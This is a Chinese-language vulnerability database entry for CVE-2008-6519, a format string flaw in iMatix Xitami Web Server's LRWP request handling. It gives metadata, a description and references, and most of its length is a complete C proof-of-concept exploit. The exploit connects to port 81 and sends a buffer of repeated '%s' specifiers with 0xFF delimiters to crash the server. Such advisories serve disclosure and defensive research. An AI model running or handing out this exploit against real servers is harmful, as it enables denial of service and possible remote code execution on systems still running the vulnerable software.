iMatix Xitami 格式字符串漏洞

漏洞ID 1114905 漏洞类型 格式化字符串
发布时间 2008-04-03 更新时间 2009-03-25
CVE编号 CVE-2008-6519 CNNVD-ID CNNVD-200903-398
漏洞平台 Windows CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/5354
https://cxsecurity.com/issue/WLB-2009030222
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-398
|漏洞详情
Xitami是由iMatix公司开发的一个自由、开放源码的Web和FTP服务器产品。Xitami Web Server 2.2a版本至2.5c2版本及其他版本中存在格式字符串漏洞。远程攻击者可以借助在长期运行Web进程(LRWP)请求中提交格式字符串说明符,造成拒绝服务(后台程序崩溃)并可能执行任意代码。这些格式字符串说明符会触发存在缺陷的代码路径,包括SMT内核中的sendfmt函数。
|漏洞EXP
/**
 *
 * PoC exploit for Xitami Web Server v2.5c2 LRWP processing format string bug
 * Advisory is available at: http://www.bratax.be/advisories/b013.html
 * (multiple vulnerabilities! check it out!)
 *
 * @author: bratax
 * @url: http://www.bratax.be/
 * @email: bratax@gmail.com
 *
 * Thanks to BuzzDee for learning me how to use reverse code engineering to
 * find bugs & thanks to DiabloHorn as well ;-)
 * Greetz to NR!
 *
**/

#include <stdio.h>
#include <string.h>
#include <winsock2.h>

#pragma comment(lib, "ws2_32.lib")
#define PORT 81 // target port

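/*
 * Entry point: connect to the target's LRWP port (PORT, defined above),
 * send a single request whose body consists of format-string conversions,
 * then exit.
 *
 * argv[1] is the target hostname; argc must be exactly 2.
 * Returns 0 once the request has been transmitted, -1 on a usage error or
 * on any Winsock/socket failure. Winsock state and the socket are released
 * on every exit path taken after they were acquired (the original PoC
 * skipped WSACleanup on several paths).
 */
int main(int argc, char *argv[]){
  int rc = -1;                 /* exit status; becomes 0 only after a complete send */
  int sockfd;
  struct hostent *he;
  struct sockaddr_in their_addr;
  WSADATA wsaData;
  char formatstring[250];

  if (argc != 2){
    printf("\nXitami Web Server 2.5c2\n" );
    printf("Format String PoC by bratax - http://www.bratax.be/\n\n");
    printf("[+] tested on WinXP Pro SP2 & Vista\n");
    printf("[+] usage: %s <hostname>\n\n", argv[0]);
    return -1;
  }

  if (WSAStartup(MAKEWORD(1, 1), &wsaData) != 0) {
    fprintf(stderr, "WSAStartup failed.\n");
    return -1;
  }

  /* Winsock does not set errno, so perror() would print a meaningless
     message for these calls; report the failure directly instead. */
  if ((he = gethostbyname(argv[1])) == NULL){
    fprintf(stderr, "[-] gethostbyname failed for %s\n", argv[1]);
    goto out_wsa;
  }

  if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1){
    fprintf(stderr, "[-] socket failed.\n");
    goto out_wsa;
  }

  /* Zero the whole struct (covers sin_zero) before filling in the fields. */
  memset(&their_addr, 0, sizeof their_addr);
  their_addr.sin_family = AF_INET;
  their_addr.sin_port = htons(PORT);                 /* network byte order */
  /* Copy the first resolved address; avoids the aliasing cast through
     (struct in_addr *) that the original used. */
  memcpy(&their_addr.sin_addr, he->h_addr_list[0], sizeof their_addr.sin_addr);

  if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof their_addr) == -1){
    printf("[-] Connect failed.\n");
    goto out_sock;
  }

  printf("[+] Server is listening...\n");

  Sleep(1000);

  /*
   * Request body layout (250 bytes, deliberately not NUL-terminated):
   *   bytes   0..199  "%s" repeated 100 times
   *   byte    200     0xFF  (field delimiter)
   *   bytes 201..248  'A' filler ("somestring" in the author's notation)
   *   byte    249     0xFF  (terminator)
   * The author's original note: "%s"*100 terminates the server process,
   * while a single "%n" in the same position crashes it.
   */
  memset(formatstring, '\x41', sizeof formatstring);
  for (int i = 0; i < 200; i += 2){
    memcpy(formatstring + i, "%s", 2);
  }
  formatstring[200] = '\xFF';
  formatstring[249] = '\xFF';

  printf("[+] Sending format string request...");
  fflush(stdout);              /* no newline above: show progress before the delay */
  Sleep(2000);

  /* send() may accept fewer bytes than requested; loop until the whole
     buffer is out rather than treating a short send as success. */
  size_t sent = 0;
  while (sent < sizeof formatstring) {
    int n = send(sockfd, formatstring + sent, (int)(sizeof formatstring - sent), 0);
    if (n <= 0) {
      Sleep(2000);
      printf("failed! Exiting...\n");
      goto out_sock;
    }
    sent += (size_t)n;
  }

  Sleep(2000);
  printf("done.\n");
  rc = 0;

out_sock:
  closesocket(sockfd);
out_wsa:
  WSACleanup();
  return rc;
}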

// milw0rm.com [2008-04-03]
|参考资料

来源:XF
名称:xitami-lrwp-requestlogging-code-execution(41644)
链接:http://xforce.iss.net/xforce/xfdb/41644
来源:BID
名称:28603
链接:http://www.securityfocus.com/bid/28603
来源:MILW0RM
名称:5354
链接:http://www.milw0rm.com/exploits/5354
来源:MISC
链接:http://www.bratax.be/advisories/b013.html